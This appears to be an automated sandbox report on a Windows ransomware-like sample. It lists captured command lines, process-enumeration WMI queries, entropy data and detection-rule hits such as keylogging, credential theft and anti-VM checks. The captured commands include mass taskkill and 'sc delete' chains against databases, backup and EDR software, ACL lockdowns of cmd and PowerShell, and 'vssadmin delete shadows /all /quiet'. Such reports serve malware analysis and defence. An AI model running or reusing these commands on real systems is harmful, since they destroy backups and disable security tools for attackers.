| cmdline | cacls C:\Windows\system32\mshta.exe /e /d mssqlserver |
| cmdline | takeown /f C:\Windows\system32\mshta.exe /a |
| cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f |
| cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
| cmdline | cacls C:\Windows\system32\cmd.exe /e /g system:r |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service" |
| cmdline | cacls C:\Windows\system32\cmd.exe /e /d mssqlserver |
| cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
| cmdline | takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress |
| cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat C:\Users\test22\AppData\Local\Temp\kill$.exe" |
| cmdline | cacls C:\Windows\system32\mshta.exe /e /g Users:r |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system |
| cmdline | cacls C:\Windows\system32\cmd.exe /g Administrators:f |
| cmdline | takeown /f C:\Windows\system32\cmd.exe /a |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver |
| cmdline | cacls C:\Windows\system32\mshta.exe /g Administrators:f |
| cmdline | cacls C:\Windows\system32\mshta.exe /e /d system |
| cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
| cmdline | cacls C:\Windows\system32\mshta.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress |
| cmdline | cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T" |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sqlbrowser.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nginx.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "benetns.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "beremote.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "TeamViewer.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "node.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ssms.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vm-agent.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "bengine.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "httpd.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCenter.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sqlwriter.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "pg_ctl.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RemoteAssistProcess.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "TNSLSNR.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "VirtualBox.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SecureCRT.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "GNAupdaemon.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rdm.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tv_x64.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Att.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ScanFrm.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "baidunetdisk.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "TeamViewer_Service.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msftesql.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vmtoolsd.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RavTray.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "softmgrlite.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "reportingservicesservice.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RAVCp164.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "notepad++.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vm-tray.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "VBoxSDS.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "abs_deployer.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sshd.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SecureCRTPortable.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "VBoxSVC.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "pvlsvr.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "d_manage.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "oracle.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "java.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rcrelay.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sqlservr.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RsTray.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "fdlauncher.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SogouImeBroker.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "fdhost.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SyncBaseSvr.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "eSightService.exe") |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "bedbg.exe") |
| section | {u'size_of_data': u'0x0000b200', u'virtual_address': u'0x00022000', u'entropy': 7.984826702386807, u'name': u'.rsrc', u'virtual_size': u'0x0000b048'} | entropy | 7.98482670239 | description | A section with a high entropy has been found | |||||||||
| entropy | 0.275541795666 | description | Overall entropy of this PE file is high | |||||||||||
| description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
| description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
| description | (no description) | rule | DebuggerHiding__Thread | ||||||
| description | (no description) | rule | DebuggerHiding__Active | ||||||
| description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
| description | (no description) | rule | ThreadControl__Context | ||||||
| description | (no description) | rule | SEH__vectored | ||||||
| description | Checks if being debugged | rule | anti_dbg | ||||||
| description | Bypass DEP | rule | disable_dep | ||||||
| description | Communication using DGA | rule | Network_DGA | ||||||
| description | Communications use DNS | rule | Network_DNS | ||||||
| description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
| description | Create a windows service | rule | Create_Service | ||||||
| description | Record Audio | rule | Sniff_Audio | ||||||
| description | Escalate priviledges | rule | Escalate_priviledges | ||||||
| description | Run a KeyLogger | rule | KeyLogger | ||||||
| description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
| description | Communications over HTTP | rule | Network_HTTP | ||||||
| description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
| description | Communications over FTP | rule | Network_FTP | ||||||
| description | Take ScreenShot | rule | ScreenShot | ||||||
| description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
| description | Steal credential | rule | local_credential_Steal | ||||||
| description | File Downloader | rule | Network_Downloader | ||||||
| description | Communications over P2P network | rule | Network_P2P_Win | ||||||
| description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
| description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
| description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
| description | (no description) | rule | DebuggerHiding__Thread | ||||||
| description | (no description) | rule | DebuggerHiding__Active | ||||||
| description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
| description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
| description | (no description) | rule | ThreadControl__Context | ||||||
| description | (no description) | rule | SEH__vectored | ||||||
| description | (no description) | rule | Check_Dlls | ||||||
| description | Possibly employs anti-virtualization techniques | rule | vmdetect | ||||||
| description | Checks if being debugged | rule | anti_dbg | ||||||
| description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
| description | AntiVM checks for VMWare | rule | antivm_vmware | ||||||
| description | Bypass DEP | rule | disable_dep | ||||||
| description | Affect hook table | rule | win_hook | ||||||
| description | Communication using DGA | rule | Network_DGA | ||||||
| description | Communications use DNS | rule | Network_DNS | ||||||
| description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
| description | Create a windows service | rule | Create_Service | ||||||
| description | Record Audio | rule | Sniff_Audio | ||||||
| description | Escalate priviledges | rule | Escalate_priviledges | ||||||
| description | Run a KeyLogger | rule | KeyLogger | ||||||
| description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
| description | Communications over HTTP | rule | Network_HTTP | ||||||
| cmdline | net stop VMUSBArbService |
| cmdline | sc delete OracleOraDb11g_home1TNSListener |
| cmdline | sc delete ADWS |
| cmdline | sc delete apachezt |
| cmdline | sc delete CIS |
| cmdline | taskkill /IM fdlauncher.exe /F |
| cmdline | taskkill /IM wrapper.exe /F |
| cmdline | sc delete vmware-converter-worker |
| cmdline | cacls C:\Windows\system32\net.exe /e /d system |
| cmdline | sc delete RTCAVMCU |
| cmdline | cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA" |
| cmdline | cacls C:\Windows\system32\net.exe /e /d SERVICE |
| cmdline | sc delete "SyncBASE Service" |
| cmdline | sc delete BackupExecManagementService |
| cmdline | net stop MSExchangeSubmission |
| cmdline | taskkill /IM iexplore.exe /F |
| cmdline | cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F" |
| cmdline | net stop MSExchangeFrontEndTransport |
| cmdline | net stop MSExchangeDelivery |
| cmdline | sc delete MSSQL$SQL2008 |
| cmdline | taskkill /IM tv_w32.exe /F |
| cmdline | sc delete qemu-ga |
| cmdline | sc delete "XT800Service_Personal" |
| cmdline | C:\Windows\System32\cmd /c "C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat C:\Users\test22\AppData\Local\Temp\kill$.exe" |
| cmdline | sc delete RtcQms |
| cmdline | net stop MSExchangeADTopology |
| cmdline | cacls C:\Windows\SysWOW64\net.exe /g Administrators:f |
| cmdline | sc delete MSMQ |
| cmdline | taskkill /IM vm-tray.exe /F |
| cmdline | sc delete "ZTE USBIP Client Guard" |
| cmdline | sc delete "ZTE FileTranS" |
| cmdline | net stop ServiceMid |
| cmdline | sc delete VisualSVNServer |
| cmdline | sc delete GPSLoginSvr |
| cmdline | sc delete U8DispatchService |
| cmdline | taskkill /IM softmgrlite.exe /F |
| cmdline | net stop VMnetDHCP |
| cmdline | sc delete VGAuthService |
| cmdline | sc delete TxQBService |
| cmdline | net stop RapidRecoveryAgent |
| cmdline | taskkill /IM TeamViewer_Service.exe /F |
| cmdline | net stop VMwareHostd |
| cmdline | net stop xenlite |
| cmdline | net stop iNethinkSQLBackupSvc |
| cmdline | sc delete secbizsrv |
| cmdline | sc delete CloudExchangeService |
| cmdline | sc delete SQLWriter |
| cmdline | net stop MSExchangeDagMgmt |
| cmdline | sc delete U8KeyManagePool |
| cmdline | sc delete QQCertificateService |
| file | C:\Users\test22\AppData\Local\Temp\::恢复cmd默认关联 |
| cmdline | vssadmin delete shadows /all /quiet |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service" |
